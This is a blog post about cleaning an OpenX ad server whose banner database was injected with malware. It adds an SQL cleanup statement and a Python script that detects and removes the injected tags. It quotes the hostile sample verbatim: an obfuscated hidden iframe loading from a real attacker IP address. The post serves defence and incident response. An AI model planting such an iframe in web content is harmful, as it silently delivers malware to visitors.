OpenX – security problem with malware hack

It hit me cold when I saw the virus scanner's red warning jump up on the screen. Administering www.weimar.de, it is no fun to have a virus warning on the front page of an official website.

The reason was OpenX, version 2.8.1, which I updated to 2.8.5 – which seemed too late, since the database was already affected. I found this code within my banner JavaScript:

<"+"iframe src=\"http://194.8.250.211/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>

I checked all PHP files (most importantly these three):

  • /var/yourdomain.conf.php
  • /adjs.php
  • /www/delivery/ajs.php

and found nothing. Check them anyway, because in some cases the hack is placed directly within those files (at the very beginning or the end).

So I checked my database, the table phpads_banners (or openx_banners), and found nothing obvious. The malicious code is hidden within the BLOB fields (whose content you can only see if you enable it in phpMyAdmin), and therefore there's one thing you can do: set the fields:

  • prepend
  • append
  • html_cache
  • html_template

empty!

I rigorously cleared out all the sh*t with this simple statement:

UPDATE `my_db`.`phpads_banners` SET `append` = NULL,`prepend` = NULL,`htmltemplate` = NULL, `htmlcache` = NULL WHERE 1;
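The UPDATE above blanks those four fields on every banner, including clean ones that legitimately use prepend/append or an HTML template. The following is an added example, not code from the post or from OpenX, showing how to find the infected rows first and null only the affected fields. It reproduces the obfuscation trick visible in the injected snippet (the tag name split with "+" so that a plain search for "<iframe" misses it), so it normalises the BLOB content before scanning. The column names append, prepend, htmltemplate and htmlcache are taken from the UPDATE statement; the rest of the table schema, the sample rows and the placeholder host are constructed for this example, and an in-memory SQLite table stands in for the MySQL database.

```python
import re
import sqlite3

# BLOB fields of the banners table that the post identifies as the hiding place.
# Names follow the UPDATE statement in the post; the other columns are assumed.
BANNER_FIELDS = ("prepend", "append", "htmltemplate", "htmlcache")

# Constructed sample of the injected snippet: the tag names are split with "+" exactly
# as in the post, the host is replaced by a placeholder.
INJECTED = (
    '<"+"iframe src=\\"http://PLACEHOLDER-IOC/tds/in.cgi?default\\" width=\\"1\\" '
    'height=\\"1\\" frameborder=\\"0\\"><"+"/iframe>'
)

# Constructed rows: one clean banner, one with the payload in `append`,
# one with the payload appended to a cached HTML fragment.
SAMPLE_ROWS = [
    (1, "Legit banner", None, None,
     '<a href="https://example.org"><img src="/img/1.gif"></a>', None),
    (2, "Hacked banner", None, INJECTED, None, None),
    (3, "Hacked cache", None, None, None, "<p>hi</p>" + INJECTED),
]

# Tags that have no business in an ad banner's prepend/append/template fields.
SUSPICIOUS = re.compile(r"<\s*(iframe|script|object|embed)\b", re.IGNORECASE)


def normalise(blob):
    """Undo the '"+"' string-concatenation trick and JS quote escaping so that
    split tags read as plain HTML again."""
    if blob is None:
        return ""
    return blob.replace('"+"', "").replace('\\"', '"')


def is_suspicious(blob):
    """True when the normalised field contains an injected tag."""
    return SUSPICIOUS.search(normalise(blob)) is not None


def build_table(conn, rows):
    """Create a stand-in for phpads_banners and load the sample rows."""
    conn.execute(
        "CREATE TABLE phpads_banners (bannerid INTEGER PRIMARY KEY, description TEXT, "
        "prepend TEXT, append TEXT, htmltemplate TEXT, htmlcache TEXT)"
    )
    conn.executemany("INSERT INTO phpads_banners VALUES (?,?,?,?,?,?)", rows)


def find_infected(conn):
    """Return {bannerid: [field, ...]} for rows whose BLOB fields contain injected tags."""
    cur = conn.execute(
        f"SELECT bannerid, {', '.join(BANNER_FIELDS)} FROM phpads_banners"
    )
    hits = {}
    for row in cur:
        bad = [f for f, val in zip(BANNER_FIELDS, row[1:]) if is_suspicious(val)]
        if bad:
            hits[row[0]] = bad
    return hits


def clean_infected(conn):
    """Null only the fields that tested positive, leaving clean banners untouched.
    Returns the number of fields cleared. Field names come from the fixed tuple
    above, never from user input."""
    cleared = 0
    for bannerid, fields in find_infected(conn).items():
        for field in fields:
            conn.execute(
                f"UPDATE phpads_banners SET {field} = NULL WHERE bannerid = ?",
                (bannerid,),
            )
            cleared += 1
    conn.commit()
    return cleared


def demo():
    """Scan, clean, rescan; returns (hits before, fields cleared, hits after)."""
    conn = sqlite3.connect(":memory:")
    build_table(conn, SAMPLE_ROWS)
    before = find_infected(conn)
    cleared = clean_infected(conn)
    after = find_infected(conn)
    return before, cleared, after


if __name__ == "__main__":
    print(demo())
```

Against a real OpenX install the same logic applies to a dump of the banners table; take a backup before clearing anything, and re-run the scan after the cleanup and after the upgrade, since a fix to the database alone does not close the hole that let the payload in.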

Good luck!